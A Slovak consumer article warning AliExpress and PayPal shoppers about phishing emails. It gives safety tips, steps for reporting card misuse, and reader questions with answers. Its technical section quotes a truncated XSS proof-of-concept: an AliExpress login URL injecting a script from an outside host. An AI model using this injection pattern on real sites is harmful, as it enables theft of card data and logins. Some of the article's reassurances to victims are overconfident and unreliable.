Podvodné emaily Aliexpress a PayPal – zneužitie platobnej karty

0
177

Kybernetickí útočníci stále skúšajú získavať citlivé údaje používateľov nakupujúcich na Aliexpress, a to cez podvodné emaily. Takýto email môže vyzerať ako email officiálných stránok Aliexpress. Môže obsahovať prílohu, ktorá pri otvorení uvoľní na Váš pevný disk škodlivý počítačový program. Keď je po otvorení vírus aktivovaný, tak program z Vášho počítača skopíruje citlivé údaje. A to vrátane e-mailových účtov, čísel kreditných kariet, prístupu do PayPal, eBay, Aliexpress, Amazon a ďalších eshopov. Tieto stiahnuté dáta sú potom odoslané podvodníkovi, ktorý ich môže využiť pre svoj vlastný úžitok.

 Toto upozornenie neplatí len pre zahraničné eshopy akým je Aliexpress, ale aj pre tie slovenské a české eshopy, kde bežne každý deň nakupujete. Podvodný email Vám môže byť odoslaný s hlavičkou akéhokoľvek odosielateľa. Obchod Aliexpress alebo platobná brána PayPal tu slúžia len ako príklad. 

Bezpečnostné tipy:

  • Skontrolujte si odosielateľa, ktorý Vám email poslal.
  • Vyhnite sa otváraniu odkazov alebo príloh, ktoré sú v podozrivom emaile.
  • Neotvárajte podozrivé webové stránky, ktoré potrebujú zadať Vaše prihlasovacie údaje.

Tieto tipy platia ako všeobecné pravidlo pre bezpečné nakupovanie na internete.

 

Ako Vás môžu okradnúť?

Odborníci zo zahraničnej bezpečnostnej firmy CheckPoint zistili zraniteľnosť v internetovom obchode AliExpress, ktorý bol cieľom počas predvianočných nákupov. Vďaka tomu mohli od dôverčivých používateľov veľmi presvedčivo získať potrebné údaje o ich platobných kartách. Na začiatku všetkého bol dobrý úmysel reťazca AliExpress, ktorý ponukol svojim zákazníkov, aby si vo svojom profile trvalo uložili údaje o svojej platobnej karte. Spolu s bezpečnostnou medzerou vo svojom systéme však reťazec nevedome umožnil, aby tieto údaje boli schopní prevziať prípadní útočníci. Aliexpress sa už proti konkrétnemu napadnutiu poriadne zabezpečil.

Technické vysvetlenie: Útočník teda môže rozoslať emailovú správu s odkazom, ktorý síce smeruje na oficiálnu stránku Aliexpress, avšak nesie si so sebou škodlivý kód, ktorý následne legitímnu stránku upraví ju pre potreby útočníka. Obeť teda síce zadá údaje o svojej karte na legitímnej stránke, avšak aj napriek tomu budú údaje odoslané útočníkovi. https://login.aliexpress.com/havana_login_check.ht… type=’text/javascript‘ src=“https://gmailtracker.com/poc.js“. Kód využil XSS zraniteľnosť servera AliExpress. E-shop síce má základnú ochranu proti XSS, teda proti spúšťanie škodlivého kódu z cudzích domén, kód z vlastnej domény však spúšťa bez kontroly, čoho využíva tzv. XSS. Útočníkom teda stačí nájsť stránku v rámci domény AliExpress.com, ktorá ich škodlivý kód prenesie so sebou, a teda zvalidní. 
coupon-overlay-1024x453
Prikladom je podvodný email, v ktorom podvodník sľuboval 50 dolárový kupón, ak si uložíte svoju kreditnú kartu. Email bol odoslaný z vymyslené emailovej adresy typu [email protected]. Pokiaľ tento email otvoríte, tak sa nič nedeje. Problém v tomto prípade nastane, keď na odkaz kliknete a vyplníte číslo vašej kreditnej karty. Tým odošlete všetky údaje o vašej karte podvodníkovi a kupón samozrejme nedostanete. S Aliexpress to nema nič spoločné.


Obrázkové príklady podvodných emailov

Pozorne sa pozrite na obrázky, ktorými skúšali podvodníci okradnúť užívateľa Aliexpress a PayPal. Pozrite sa z akých emailových adries bol email poslaný.

 

1. Žiadosť o overenie vášho účtu na Aliexpress

 

spam-aliexpress2

 

spam-aliexpress5

 


2. Výzva k aktualizácii údajov na Vašom účte Aliexpress

 

spam-aliexpress3-1024x431


3. Váš účet bol dočasne zablokovaný a je potrebné ho overiť.

 

spam-aliexpress4

spam-aliexpress6-1024x467 
 


4. PayPal – Podobné emaily môžete dostať z akejkoľvek adresy, nie len z falošného Aliexpress

paypal fraud spam zneuziti

 


5. Overenie účtu na Paypal

Po kliknutí na odkaz vás to presmeruje na falošné stránky PAYPAL (stránky vyzerajú veľmi podobne). Tu sa budete pokúšať prihlásiť a tým pádom podvodníkom odošlite Vaše prihlasovacie údaje.

 

paypal verify translaction spam scam

 


Čo robiť keď mi niekto zneužije kartu

  • Pravidelne si kontrolujte zaúčtované transakcie na účte ku karte.
  • Ak máte podozrenie, že (by) mohlo dôjsť k zneužitiu Vašej karty alebo údajov z nej, kontaktujte neodkladne non-stop klientsku linku banky či vydavateľa platobnej karty, nahláste zneužitie karty a kartu zablokujte. Blokácia je zadarmo.
  • Zneužitie a blokáciu možno vykonať aj priamo na pobočke banky či u členské banky kartovej asociácie v zahraničí (MasterCard, VISA atď.).
  • Keď budete reklamovať transakciu, ktorú ste nevykonali, pripravte sa na to, že budete musieť uviesť dôvody, prečo s transakciou nesúhlasíte, poprípade doložiť doklady alebo dokumenty. Z našich skúsenosti sú tieto transakcie vystornované a peniaze vrátené na kartový účet.
  • Ak reklamáciu banka zamietne, skúste uplatniť reklamáciu cez Finančného arbitra

 

Časté otázky ľudí, ktorí sa stali obeťami podvodných emailov

Otázka: Stale sa to opakuje, zneužitia karty … Aj ja som si na zaciatku ulozila kartu a rada by som ju zmazala … Lenže dostupne navody ukazujem, ze po kliknuti na MY Alipay sa zobrazi moznost otvorit ucet … Me to ale nejde … zobrazí sa nieco ine. Len akoby reklamni stranka Alipay a keď odtiaľ idem na svoj ucet, hodi me to späť na hlavnú stranu Aliexpresu … Nejaka rada? Dekuji

Odpověd: Dobrý deň, karty si môžete zmazať podľa nášho postupu – Ako odstrániť kreditnej karte. Pre prístup na stránky použite tento odkaz na Alipay.


Otázka: Ahoj všetkým. Tak som práve zistil, že mi nejaký Číňan z účtu vybral 110EUR  za nákup, ktorý som nikdy nevykonal, tak si dávajte pozor na účty a čo vám z neho strhnú. Mal som nakúpiť a zaplatiť v piatok večer kartou a to som nemohol, pretože som bol v krčmičke. Už to reklamujem v banke.

Odpoveď: Dobrý deň, Číňan vám určite nevybral 110EUR za nákup. Číňan vaše peniaze nemá, pretože do potvrdenia objednávky sú uložené na Aliexpress. S veľkou pravdepodobnosťou ste sa stali obeťou emailového útoku. Reklamácie u Banky by vám peniaze mala navrátiť. Aliexpress je v tomto nevinne. Dávajte pozor načo klikáte.


Otázka: Bacha na phishing. Mňa sa takto nabúrali na kartu pri bankomate a ani nemuseli vedieť PIN. Za dve hodiny mi prišla SMS, že ako nakupujem niečo zo zahraničia a že si mám navýšiť limit. Ihneď volám do banky, tam ma upokojujú, že to môže byť nejaká chyba. Potom to prišlo druhýkrát a tretíkrát potvrdení nákupu z cudziny, konkrétne z Holandska. Volám druhýkrát do banky, kde mi bolo povedané, že to mali stopnúť pri prvom hovore, tak zablokovali kartu a povedali mi, že sa pokúšal niekto ešte o ďalšie dva nákupy. Kartu poslali novú a na pobočku som išla podať sťažnosť a spísať protokol. Peniaze vrátili, ale teraz mám blbý pocit vždy, keď idem vyberať z bankomatu.

Odpoveď: Máme podobnú vlastnú skúsenosť pri návšteve zábavného parku v Orlande v USA. Kartu sme z vrecka ani nevytiahli. Načítali si to čítačkou, keď prechádzali tesne okolo nás v dave. Zistili sme to až za mesiac a vybrali nám okolo 1200 EUR. Poistenie karty sme nemali. Všetko nám ale bolo samozrejme vrátené späť.


Otázka: Ahoj, tiež sa podelím so svojou skúseností na aliexpressu. Trebárs mi aj niekto poradíte či ide ešte niečo robiť. Pred týždňom mi zrazu z ničoho nič začali chodiť SMS z banky s kódom pre zaplatenie nákupu na aliexpress.com. Tak som si hovoril, že je to asi nejaký omyl, pretože som tam nič momentálne nenakupovali. SMS ale začali chodiť viac a viac a zakaždým iná suma. Išiel som teda z práce domu, sadol k PC a išiel na účet. Zistil som že na účte mám 18 čakajúcich transakcií bez toho aby som čokoľvek odsúhlasil, čokoľvek si objednal a niekam zadal kód. Chcel som sa teda prihlásiť na účet aliexpress.com a nedostal som sa tam. Zakaždým mi to písalo, že účet neexistuje aj cez kontrolu cez telefón atď. Uvedomil som si, že mi ráno prišiel mail, kde bolo napísané, že ak nezadáte doplňujúce údaje k účtu aliexpress, tak bude zrušený. Ja blbec som mail otvoril, zadal klasické údaje ako adresa atď. A vsetko ukončil. Vypol PC a hurá do práce. Vďaka tomuto sa mi niekto hecknul do účtu aliexpress, kde opäť vďaka mojej blbosti boli uložené údaje z mojej kreditnej karty bez toho aby som o tom vedel a dotyčný hacker si začal objednávať čo to ide.
Ihneď ako som to zjistitl, tak som volal do banky a kartu zablokoval. Druhý deň som v banke podal reklamáciu, pretože nechápem prečo banka platby pustila, keď ja som žiadnu platbu nepotvrdil. Na aliexpressu som sa pokúšal komunikovať niekoľkokrát po chatu s techniky. Zakaždým mi sľúbili že sa mi ozvú na mail, že mi účet zrušili a zistili sme aj mail toho dotyčného čo mi účet napadol. Ale bohužiaľ reakcia žiadna. Jeden technik mi napísal aké mám napísať údaje do mailu a zaslať ich na mail: [email protected]. Bohužiaľ sa mi ale všetky maily vrátili ako nedoručené. Takže som zbytočne prišiel o veľa peňazí a neviem ako ich dostať späť. Dávajte si teda pozor na tieto maily a hlavne nech nemá váš účet na aliexpressu uložené údaje z kreditnej karty. Ja si toho bohužiaľ nevšimol, že sa automaticky uložili.

Odpoveď: Áno, ste ukážkový príklad emailového phishingu. Navrátenie peňazí riešte priamo s bankou alebo potom cez finančného arbitra.


Ak máte nejaké otázky alebo vlastnú skúsenosť (kladnú alebo zápornú), napíšte nám ju, prosím, do komentára po tento článok. Ďakujeme

 

 

 

 

0/5 (0 Reviews)

ZANECHAŤ ODPOVEĎ

Zadajte svoj komentár!
Zadajte svoje meno